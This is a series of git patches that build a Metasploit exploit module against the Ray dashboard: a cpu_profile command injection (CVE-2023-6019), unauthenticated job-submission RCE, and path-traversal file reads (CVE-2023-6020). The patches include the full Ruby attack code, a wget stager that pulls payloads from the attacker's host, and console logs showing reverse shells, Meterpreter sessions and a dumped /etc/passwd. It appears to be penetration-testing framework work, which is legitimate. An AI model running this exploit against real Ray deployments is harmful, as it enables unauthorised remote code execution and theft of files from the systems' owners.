From 122767cc59a5e67199bd861196b8f946117b5ea7 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 10:49:11 +0900 Subject: [PATCH 01/42] Implement CVE-2023-6019 module --- .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 112 ++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/exploits/linux/http/ray_cmdi_rce_lfi.rb diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb new file mode 100644 index 0000000000..e052e55684 --- /dev/null +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Ray cpu_profile command injection', + 'Description' => %q{ + Ray RCE via cpu_profile command injection vulnerability. + }, + 'Author' => [ + 'sierrabearchell', # Vulnerability discovery + 'byt3bl33d3r ', # Python Metasploit module + 'Takahiro Yokoyama' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2023-6019'], + ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'], + ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray'] + ], + 'CmdStagerFlavor' => %i[wget], + 'Payload' => { + 'DisableNops' => true + }, + 'Platform' => %w[linux], + 'Targets' => [ + [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], + [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] + ], + 'DefaultOptions' => { 'MeterpreterTryToFork' => true }, + 'DefaultTarget' => 0, + 'DisclosureDate' => '2023-11-15', + 'Notes' => { + 'Stability' => [ CRASH_SAFE, ], + 'SideEffects' => [], + 'Reliability' => [ REPEATABLE_SESSION, ] + } + ) + ) + + register_options( + [ + Opt::RPORT(8265), + OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019']]), + OptString.new('command', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]) + ] + ) + end + + def get_nodes + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'nodes?view=summary') + }) + return unless res && res.code == 200 + + return JSON.parse(res.body) + end + + def check + @nodes = get_nodes + return Exploit::CheckCode::Safe if @nodes.nil? + + Exploit::CheckCode::Appears + end + + def exploit + # We need to pass valid node info to /worker/cpu_profile for the server to process the request + # First we list all nodes and grab the pid and ip of the first one (could be any) + @nodes ||= get_nodes + fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes + first_node = @nodes['data']['summary'].first + @pid = first_node['agent']['pid'] + @ip = first_node['ip'] + print_good("Grabbed node info, pid: #{@pid}, ip: #{@ip}") + + case datastore['CVE'] + when 'CVE-2023-6019' + res = execute_command(datastore['command']) + fail_with(Failure::Unknown, 'Failed to execute command') unless res + print_good("Command execution seems to have been successful. Status code: #{res.code}") + execute_cmdstager({ flavor: :wget }) + end + end + + def execute_command(cmd, _opts = {}) + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), + 'vars_get' => { + 'pid' => @pid, + 'ip' => @ip, + 'duration' => 5, + 'native' => 0, + 'format' => '`' + cmd + '`' + } + }) + end + +end From 7a233f00498f4196fa78b4aba208c39742e1b926 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 21:07:05 +0900 Subject: [PATCH 02/42] Update CVE-2023-6019 module --- .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 74 +++++++++++-------- 1 file changed, 42 insertions(+), 32 deletions(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index e052e55684..09f0b8da08 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -27,6 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2023-6019'], ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'], + ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'], + ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'], ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray'] ], 'CmdStagerFlavor' => %i[wget], @@ -70,43 +72,51 @@ class MetasploitModule < Msf::Exploit::Remote end def check - @nodes = get_nodes - return Exploit::CheckCode::Safe if @nodes.nil? - - Exploit::CheckCode::Appears - end - - def exploit - # We need to pass valid node info to /worker/cpu_profile for the server to process the request - # First we list all nodes and grab the pid and ip of the first one (could be any) - @nodes ||= get_nodes - fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes - first_node = @nodes['data']['summary'].first - @pid = first_node['agent']['pid'] - @ip = first_node['ip'] - print_good("Grabbed node info, pid: #{@pid}, ip: #{@ip}") - case datastore['CVE'] when 'CVE-2023-6019' - res = execute_command(datastore['command']) - fail_with(Failure::Unknown, 'Failed to execute command') unless res - print_good("Command execution seems to have been successful. Status code: #{res.code}") - execute_cmdstager({ flavor: :wget }) + @nodes = get_nodes + return Exploit::CheckCode::Safe if @nodes.nil? + + return Exploit::CheckCode::Appears end end - def execute_command(cmd, _opts = {}) - send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), - 'vars_get' => { - 'pid' => @pid, - 'ip' => @ip, - 'duration' => 5, - 'native' => 0, - 'format' => '`' + cmd + '`' - } - }) + def exploit + case datastore['CVE'] + when 'CVE-2023-6019' + # We need to pass valid node info to /worker/cpu_profile for the server to process the request + # First we list all nodes and grab the pid and ip of the first one (could be any) + @nodes ||= get_nodes + fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes + first_node = @nodes['data']['summary'].first + fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid') + pid = first_node['agent']['pid'] + fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip') + ip = first_node['ip'] + print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") + opts = { pid: pid, ip: ip } + res = execute_command(datastore['command'], opts) + fail_with(Failure::Unknown, 'Failed to execute command') unless res + print_good("Command execution seems to have been successful. Status code: #{res.code}") + execute_cmdstager({ flavor: :wget }.merge(opts)) + end + end + + def execute_command(cmd, opts = {}) + case datastore['CVE'] + when 'CVE-2023-6019' + return send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), + 'vars_get' => { + 'pid' => opts[:pid], + 'ip' => opts[:ip], + 'duration' => 5, + 'native' => 0, + 'format' => "`#{cmd}`" + } + }) + end end end From a5009cd5ff4e7e846ebc4a63c6b61ca0f04d68f6 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 21:43:17 +0900 Subject: [PATCH 03/42] Add RCE --- .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 38 ++++++++++++++++++- 1 file changed, 36 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 09f0b8da08..f20e708b66 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -14,9 +14,14 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => 'Ray cpu_profile command injection', + 'Name' => 'Ray cpu_profile command injection, Ray Agent Job RCE', 'Description' => %q{ Ray RCE via cpu_profile command injection vulnerability. + + RCE in Ray via the agent job submission endpoint. + This is intended functionality as Ray's main purpose is executing arbitrary workloads. + By default Ray has no authentication. + }, 'Author' => [ 'sierrabearchell', # Vulnerability discovery @@ -55,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019']]), + OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE']]), OptString.new('command', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]) ] ) @@ -71,12 +76,35 @@ class MetasploitModule < Msf::Exploit::Remote return JSON.parse(res.body) end + def get_job_data(cmd) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), + 'data' => {'entrypoint' => cmd}.to_json + }) + unless res && res.code == 200 + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'), + 'data' => {'entrypoint' => cmd}.to_json + }) + end + return unless res && res.code == 200 + + return JSON.parse(res.body) + end + def check case datastore['CVE'] when 'CVE-2023-6019' @nodes = get_nodes return Exploit::CheckCode::Safe if @nodes.nil? + return Exploit::CheckCode::Appears + when 'RCE' + @job_data = get_job_data(datastore['command']) + return Exploit::CheckCode::Safe if @job_data.nil? + return Exploit::CheckCode::Appears end end @@ -99,6 +127,10 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Failed to execute command') unless res print_good("Command execution seems to have been successful. Status code: #{res.code}") execute_cmdstager({ flavor: :wget }.merge(opts)) + when 'RCE' + @job_data ||= get_job_data(datastore['command']) + print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") + execute_cmdstager({ flavor: :wget }) end end @@ -116,6 +148,8 @@ class MetasploitModule < Msf::Exploit::Remote 'format' => "`#{cmd}`" } }) + when 'RCE' + get_job_data(cmd) end end From ca0dba18442620ae26515e07c540286f78192207 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 22:02:37 +0900 Subject: [PATCH 04/42] Add LFI --- .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 36 +++++++++++++++---- 1 file changed, 30 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index f20e708b66..0c8518398e 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => 'Ray cpu_profile command injection, Ray Agent Job RCE', + 'Name' => 'Ray cpu_profile command injection, Ray Agent Job RCE and Ray static arbitrary file read', 'Description' => %q{ Ray RCE via cpu_profile command injection vulnerability. @@ -22,18 +22,23 @@ class MetasploitModule < Msf::Exploit::Remote This is intended functionality as Ray's main purpose is executing arbitrary workloads. By default Ray has no authentication. + Ray before 2.6.3 is vulnerable to a local file inclusion. }, 'Author' => [ 'sierrabearchell', # Vulnerability discovery 'byt3bl33d3r ', # Python Metasploit module + 'danmcinerney ', # Python Metasploit module 'Takahiro Yokoyama' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-6019'], ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'], + # RCE ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'], ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'], + ['CVE', '2023-6020'], + ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'], ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray'] ], 'CmdStagerFlavor' => %i[wget], @@ -60,8 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE']]), - OptString.new('command', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]) + OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE', 'CVE-2023-6020']]), + OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), + OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd']) ] ) end @@ -94,6 +100,16 @@ class MetasploitModule < Msf::Exploit::Remote return JSON.parse(res.body) end + def lfi + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") + }) + return unless res && res.code == 200 + res.body + end + + def check case datastore['CVE'] when 'CVE-2023-6019' @@ -102,9 +118,14 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Appears when 'RCE' - @job_data = get_job_data(datastore['command']) + @job_data = get_job_data(datastore['COMMAND']) return Exploit::CheckCode::Safe if @job_data.nil? + return Exploit::CheckCode::Appears + when 'CVE-2023-6020' + @file_content = lfi + return Exploit::CheckCode::Safe if @file_content.nil? + return Exploit::CheckCode::Appears end end @@ -123,14 +144,17 @@ class MetasploitModule < Msf::Exploit::Remote ip = first_node['ip'] print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") opts = { pid: pid, ip: ip } - res = execute_command(datastore['command'], opts) + res = execute_command(datastore['COMMAND'], opts) fail_with(Failure::Unknown, 'Failed to execute command') unless res print_good("Command execution seems to have been successful. Status code: #{res.code}") execute_cmdstager({ flavor: :wget }.merge(opts)) when 'RCE' - @job_data ||= get_job_data(datastore['command']) + @job_data ||= get_job_data(datastore['COMMAND']) print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") execute_cmdstager({ flavor: :wget }) + when 'CVE-2023-6020' + @file_content ||= lfi + print_good(@file_content) end end From 729ecc588a24fec4a5134b43d721bf4a42a62796 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 22:07:53 +0900 Subject: [PATCH 05/42] Formatting lfi output --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 0c8518398e..10483e1b47 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote execute_cmdstager({ flavor: :wget }) when 'CVE-2023-6020' @file_content ||= lfi - print_good(@file_content) + print_good("#{datastore['FILEPATH']}\n#{@file_content}") end end From 0251f1bd8d0dcf83374d1fabb4730dc2213ee3b7 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 22:10:15 +0900 Subject: [PATCH 06/42] Rubocop formatting --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 10483e1b47..8f477ee2cb 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -86,13 +86,13 @@ class MetasploitModule < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), - 'data' => {'entrypoint' => cmd}.to_json + 'data' => { 'entrypoint' => cmd }.to_json }) unless res && res.code == 200 res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'), - 'data' => {'entrypoint' => cmd}.to_json + 'data' => { 'entrypoint' => cmd }.to_json }) end return unless res && res.code == 200 @@ -106,10 +106,10 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") }) return unless res && res.code == 200 + res.body end - def check case datastore['CVE'] when 'CVE-2023-6019' From 93f1362d22bad72bb85dd24354143c17ffbae637 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Mon, 5 Aug 2024 08:47:29 +0900 Subject: [PATCH 07/42] Add module document --- .../exploit/linux/http/ray_cmdi_rce_lfi.md | 219 ++++++++++++++++++ 1 file changed, 219 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md new file mode 100644 index 0000000000..2ea8d4c1a1 --- /dev/null +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -0,0 +1,219 @@ +## Vulnerable Application + +Ray (<=v2.6.3) is vulnerable to three vulnerabilities: + * RCE via cpu_profile command injection vulnerability (CVE-2023-6019) + * RCE via the agent job submission endpoint (No CVE) + * local file inclusion (CVE-2023-6020) + +This module exploits all three vulnerabilities. + +The vulnerability affects: + * Ray (<=v2.6.3) + +This module was successfully tested on: + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 + +### Install and run the vulnerable Ray (v2.6.3) + +1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. +2. Install Kali Linux (or other Linux distro) in your virtualization engine. +3. Pull pre-built Ray docker container (v2.6.3) in your VM. + `docker pull rayproject/ray:2.6.3` +4. Start the ray container. + `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` +5. Start ray. + `ray start --head --dashboard-host=0.0.0.0` + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use exploit/linux/http/ray_cmdi_rce_lfi` +4. Do: `set rhost ` +5. Optional: `set rport ` +6. Do: `set lhost ` +7. Optional: `set CVE ` +8. Do: `run` +9. You should get a shell or meterpreter + +## Options + +### CVE (required) + +This is the vulnerability to use. Default is `CVE-2023-6019`, but `RCE` and `CVE-2023-6020` can also be chosen. + +### COMMAND (required) + +This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when CVE is set to `CVE-2023-6019` or `RCE`. + +### FILEPATH (required) + +This is the file to read. Default is `/etc/passwd`. This is used when CVE is set to `CVE-2023-6020`. + +## Scenarios +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0) +``` +msf6 > use exploit/linux/http/ray_cmdi_rce_lfi +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 +cve => CVE-2023-6019 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 +target => 0 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[+] Grabbed node info, pid: 124, ip: 172.17.0.2 +[+] Command execution seems to have been successful. Status code: 500 +[*] Using URL: http://192.168.56.1:8080/VvzBBm8 +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /VvzBBm8 +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (3045380 bytes) to 192.168.56.6 +[*] Command Stager progress - 100.00% done (112/112 bytes) +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40554) at 2024-08-05 08:26:42 +0900 +[*] Server stopped. + +meterpreter > sysinfo +Computer : 172.17.0.2 +OS : Ubuntu 20.04 (Linux 6.6.15-amd64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 1) +``` +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 +cve => CVE-2023-6019 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 +target => 1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp +payload => linux/x86/shell/reverse_tcp +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[+] Grabbed node info, pid: 124, ip: 172.17.0.2 +[+] Command execution seems to have been successful. Status code: 500 +[*] Using URL: http://192.168.56.1:8080/tMBeDO +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /tMBeDO +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (36 bytes) to 192.168.56.6 +[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:39652) at 2024-08-05 08:28:46 +0900 +[*] Command Stager progress - 100.00% done (111/111 bytes) +[*] Server stopped. + +whoami +ray +pwd +/home/ray +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 0) +``` +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE +cve => RCE +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 +target => 0 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp +payload => linux/x64/shell/reverse_tcp +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[+] Command execution successful. Job ID: 'raysubmit_TKeWeJRKQZFkU2zN' Submission ID: 'raysubmit_TKeWeJRKQZFkU2zN' +[*] Using URL: http://192.168.56.1:8080/roy19E +[*] Command Stager progress - 100.00% done (111/111 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /roy19E +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (38 bytes) to 192.168.56.6 +[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:43312) at 2024-08-05 08:40:06 +0900 +[*] Server stopped. + +whoami +ray +pwd +/home/ray +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 1) +``` +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE +cve => RCE +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 +target => 1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp +payload => linux/x86/shell/reverse_tcp +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[+] Command execution successful. Job ID: 'raysubmit_g4jZ3U5aQu4gYrFy' Submission ID: 'raysubmit_g4jZ3U5aQu4gYrFy' +[*] Using URL: http://192.168.56.1:8080/ZMCKWGQCHh +[*] Command Stager progress - 100.00% done (115/115 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /ZMCKWGQCHh +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (36 bytes) to 192.168.56.6 +[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:42666) at 2024-08-05 08:41:22 +0900 +[*] Server stopped. + +whoami +ray +pwd +/home/ray +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6020) +``` +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6020 +cve => CVE-2023-6020 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[+] /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +_apt:x:100:65534::/nonexistent:/usr/sbin/nologin +ray:x:1000:100::/home/ray:/bin/bash +``` From ab38c83d9cfbc7d285aee20d7a1abd2903546e72 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Mon, 5 Aug 2024 08:51:56 +0900 Subject: [PATCH 08/42] Update module document --- documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 2ea8d4c1a1..2bfd8084eb 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -1,6 +1,7 @@ ## Vulnerable Application Ray (<=v2.6.3) is vulnerable to three vulnerabilities: + * RCE via cpu_profile command injection vulnerability (CVE-2023-6019) * RCE via the agent job submission endpoint (No CVE) * local file inclusion (CVE-2023-6020) @@ -8,9 +9,11 @@ Ray (<=v2.6.3) is vulnerable to three vulnerabilities: This module exploits all three vulnerabilities. The vulnerability affects: + * Ray (<=v2.6.3) This module was successfully tested on: + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 ### Install and run the vulnerable Ray (v2.6.3) From b487dadf8c8f0ab049ddb5d39c5b9be57b4e9432 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Mon, 5 Aug 2024 13:01:11 +0900 Subject: [PATCH 09/42] Remove explicit return --- .../modules/exploit/linux/http/ray_cmdi_rce_lfi.md | 1 + modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 13 ++++--------- 2 files changed, 5 insertions(+), 9 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 2bfd8084eb..845e8aa109 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -54,6 +54,7 @@ This is the command to execute. Default is `echo 'Hello from Metasploit'`. This This is the file to read. Default is `/etc/passwd`. This is used when CVE is set to `CVE-2023-6020`. ## Scenarios + ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0) ``` msf6 > use exploit/linux/http/ray_cmdi_rce_lfi diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 8f477ee2cb..8d8c1995eb 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote }) return unless res && res.code == 200 - return JSON.parse(res.body) + JSON.parse(res.body) end def get_job_data(cmd) @@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote end return unless res && res.code == 200 - return JSON.parse(res.body) + JSON.parse(res.body) end def lfi @@ -115,19 +115,14 @@ class MetasploitModule < Msf::Exploit::Remote when 'CVE-2023-6019' @nodes = get_nodes return Exploit::CheckCode::Safe if @nodes.nil? - - return Exploit::CheckCode::Appears when 'RCE' @job_data = 